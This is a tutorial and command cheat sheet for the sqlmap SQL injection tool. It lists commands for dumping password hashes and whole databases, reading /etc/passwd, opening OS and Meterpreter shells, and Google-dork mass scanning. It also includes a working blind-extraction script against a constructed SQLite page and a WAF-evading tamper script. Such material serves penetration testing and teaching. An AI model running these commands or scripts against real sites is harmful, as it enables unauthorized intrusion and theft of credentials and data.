About sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the penetration tester and a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
sqlmap features
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Vertica, Mckoi and Presto database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
- Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker's machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as per user's choice.
- Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
sqlmap installation
Download the installation package: https://pypi.org/project/sqlmap/#files
1. Extract the downloaded package to the root of the C: drive (any directory works; a Python interpreter must already be installed)
2. Note the path of the extracted folder
3. Add that path to the system PATH environment variable
4. Open a cmd terminal and run sqlmap.py (alternatively, pip install sqlmap installs a sqlmap command directly from the PyPI package linked above)
Using sqlmap
Retrieving basic information
sqlmap -u "http://url/news?id=1" --current-user
# Get the current database user
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db
# Get the current database name
sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
# List the tables of the given database
sqlmap -u "http://url/news?id=1" --columns -T "table_name" -D "db_name" -v 0
# List the columns of the given table
sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
# Dump the contents of the given column
Gathering sensitive information
sqlmap -u "http://url/news?id=1" --dbms "MySQL" --users
# --dbms forces the database type instead of letting sqlmap fingerprint it
sqlmap -u "http://url/news?id=1" --users
# List database users
sqlmap -u "http://url/news?id=1" --dbs
# List databases
sqlmap -u "http://url/news?id=1" --passwords
# Dump database user password hashes (sqlmap offers to crack them with a dictionary attack)
sqlmap -u "http://url/news?id=1" --passwords -U root -v 0
# Dump the password hash of the given database user
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20
# Dump the given columns, entries 1 to 20 only
sqlmap -u "http://url/news?id=1" --dump-all -v 0
# Dump all tables of all databases
sqlmap -u "http://url/news?id=1" --privileges
# List the privileges of database users
sqlmap -u "http://url/news?id=1" --privileges -U root
# List the privileges of the given user
sqlmap -u "http://url/news?id=1" --is-dba -v 1
# Check whether the current database user is a DBA
sqlmap -u "http://url/news?id=1" --roles
# Enumerate database user roles
sqlmap -u "http://url/news?id=1" --udf-inject
# Inject user-defined functions (MySQL and PostgreSQL), the route to OS-level access
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0
# Dump all tables, skipping the DBMS system databases
sqlmap -u "http://url/news?id=1" --union-cols 1-10
# Range of column counts to try for UNION query injection (narrows the column-count search)
sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE"
# Send a Cookie header; to test the cookie values themselves for injection add --level 2 or higher
sqlmap -u "http://url/news?id=1" -b
# Retrieve the DBMS banner
sqlmap -u "http://url/news?id=1" --data "id=3"
# POST injection: parameters given with --data are sent in the request body and tested
sqlmap -u "http://url/news?id=1" -v 1 -f
# Fingerprint the DBMS version
sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118"
# Route all requests through an HTTP proxy
sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE"
# String that appears in the response only when the injected condition is true (boolean-based blind)
sqlmap -u "http://url/news?id=1" --sql-shell
# Interactive SQL shell
sqlmap -u "http://url/news?id=1" --file-read /etc/passwd
# Read a file from the database server's file system
sqlmap -u "http://url/news?id=1" --os-cmd=whoami
# Execute an operating system command
sqlmap -u "http://url/news?id=1" --os-shell
# Interactive operating system shell
sqlmap -u "http://url/news?id=1" --os-pwn
# Out-of-band shell through Metasploit (command prompt, Meterpreter or VNC session)
sqlmap -u "http://url/news?id=1" --reg-read
# Read a Windows registry key value (used together with --reg-key and --reg-value)
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.sqlite"
# Save session data (retrieved data and injection state) to the given file; by default sqlmap keeps it in its output directory
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.sqlite"
# Running again with the same session file resumes from the saved progress; --flush-session discards it
Advanced Usage
-p PARAM restricts testing to the named parameter. For index.php?n_id=1&name=2&data=2020, -p name tests only the name parameter instead of all three.
sqlmap -g "google dork" --dump-all --batch  # Google dork injection: sqlmap searches Google for URLs matching the dork and tests each result; --batch accepts the default answer to every prompt; the host must be able to reach google.com
--technique=TECH selects which injection techniques to test; with no value sqlmap tests them all
• B: Boolean-based blind SQL injection
• E: Error-based SQL injection
• U: UNION query-based SQL injection
• S: Stacked queries SQL injection
• T: Time-based blind SQL injection
• Q: Inline queries (accepted by recent sqlmap versions in addition to the five above)
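What technique B does under the hood, and what the --string value from the command list above is used for, as an added example that is not sqlmap's code and not from the original page: a hypothetical handler concatenates ?id= into a SQLite query and reveals only whether a row was found, and the extractor recovers a column value one character at a time by asking yes/no questions and matching the true-page marker. The table names, rows and markers are constructed for the demo; the hardened handler is included to show why a bound parameter closes the channel.

```python
"""Boolean-based blind SQL injection (sqlmap --technique=B with --string).

Added example, not sqlmap code. The target is a hypothetical news page
backed by an in-memory SQLite database with constructed sample data; the
attacker only ever sees whether the page contains TRUE_MARKER.
"""
import sqlite3

TRUE_MARKER = "Article found"     # what you would pass as --string
FALSE_MARKER = "No such article"

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
    CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
    INSERT INTO news VALUES (1, 'Welcome'), (2, 'Second post');
    INSERT INTO users VALUES (1, 'admin', 's3cr3t!');
""")

requests_sent = 0  # counts simulated HTTP requests, as sqlmap's log would


def vulnerable_page(id_param: str) -> str:
    """Vulnerable handler (constructed): the parameter is concatenated into SQL."""
    row = conn.execute("SELECT title FROM news WHERE id=" + id_param).fetchone()
    return TRUE_MARKER if row else FALSE_MARKER


def safe_page(id_param: str) -> str:
    """Hardened handler: typed and bound, so the payload never reaches the SQL parser."""
    try:
        article_id = int(id_param)
    except ValueError:
        return FALSE_MARKER
    row = conn.execute("SELECT title FROM news WHERE id=?", (article_id,)).fetchone()
    return TRUE_MARKER if row else FALSE_MARKER


def oracle(page, condition: str) -> bool:
    """One blind request: 'id=1 AND (cond)' shows the true page iff cond holds."""
    global requests_sent
    requests_sent += 1
    return TRUE_MARKER in page("1 AND (" + condition + ")")


def extract(page, subquery: str, max_len: int = 64) -> str:
    """Recover the string produced by subquery, one character per 8 requests.

    Like sqlmap, it first checks whether position pos exists, then binary
    searches the code point of substr(value, pos, 1) over 0..255.
    """
    value = ""
    for pos in range(1, max_len + 1):
        if not oracle(page, f"length(({subquery}))>={pos}"):
            break  # past the end of the string
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(page, f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


def request_count() -> int:
    return requests_sent


if __name__ == "__main__":
    query = "SELECT pass FROM users WHERE name='admin'"
    print(f"admin password: {extract(vulnerable_page, query)!r} after {request_count()} requests")
    print("hardened page leaks:", repr(extract(safe_page, query)))
```

The 8 requests per character are why blind extraction is slow and why sqlmap prefers error-based or UNION techniques when the page allows them; time-based blind (technique T) works the same way but replaces the page marker with a measurable delay, so it needs a stable network to stay reliable.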
--tamper=SCRIPT runs every payload through one or more tamper scripts that transform it to evade web application firewalls (WAF), for example charencode (URL-encodes every character of the payload) or space2comment (replaces spaces with /**/). The scripts live in sqlmap's tamper/ directory and several can be chained with commas.
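A minimal tamper script in the format sqlmap loads with --tamper, written here as an added example (it is not one of the scripts shipped in sqlmap's tamper/ directory, although space2comment performs the same substitution). The WAF rule and the payloads are constructed for the demo; the SQLite check at the end confirms the transformed payload still parses as the same SQL, which is the property every tamper script must preserve.

```python
"""space2comment-style tamper script (sqlmap --tamper=SCRIPT).

Added example, not sqlmap code. Inside sqlmap a tamper module must expose
dependencies() and tamper(payload, **kwargs); __priority__ orders chained
scripts. The WAF rule and payloads below are constructed for the demo.
"""
import re
import sqlite3

try:
    from lib.core.enums import PRIORITY  # present when sqlmap loads the script
    __priority__ = PRIORITY.LOW
except ImportError:
    __priority__ = 0  # stand-alone run for this demo


def dependencies():
    """sqlmap calls this to report required versions or settings; none here."""
    pass


def tamper(payload, **kwargs):
    """Replace every space with an inline comment, which most DBMS parse as whitespace.

    '1 UNION ALL SELECT 2' -> '1/**/UNION/**/ALL/**/SELECT/**/2'
    """
    return payload.replace(" ", "/**/") if payload else payload


# Constructed signature of a naive WAF: keywords separated by whitespace only
WAF_RULES = [
    re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE),
    re.compile(r"\bor\s+\d+\s*=\s*\d+\b", re.IGNORECASE),
]


def waf_blocks(param_value: str) -> bool:
    """True if the constructed WAF would reject the request parameter."""
    return any(rule.search(param_value) for rule in WAF_RULES)


def same_result(original: str, tampered: str) -> bool:
    """Check the DBMS still evaluates the tampered payload to the same rows."""
    conn = sqlite3.connect(":memory:")
    return (conn.execute("SELECT " + original).fetchall()
            == conn.execute("SELECT " + tampered).fetchall())


if __name__ == "__main__":
    payload = "1 UNION ALL SELECT 2"
    evaded = tamper(payload)
    print(evaded, "| blocked:", waf_blocks(payload), "->", waf_blocks(evaded))
    print("same SQL result:", same_result(payload, evaded))
```

A WAF that normalises comments before matching would still catch this, which is why sqlmap lets you chain several scripts (for example space2comment together with a case- or encoding-based one) and why a tamper script should be chosen after identifying the specific WAF rather than applied blindly.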
sqlmap -u "http://url/news?id=1" --smart --level 3 --users
# --smart runs the thorough tests only where a positive heuristic check fires; --level (1-5) raises the number of payloads and of injection points (level 2 adds Cookie values, level 3 adds User-Agent and Referer headers)
Attack example:
sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --passwords
# Reuse an authenticated session via --cookie, tell sqlmap which string marks the true page via --string, skip fingerprinting with --dbms, then enumerate database users and their password hashes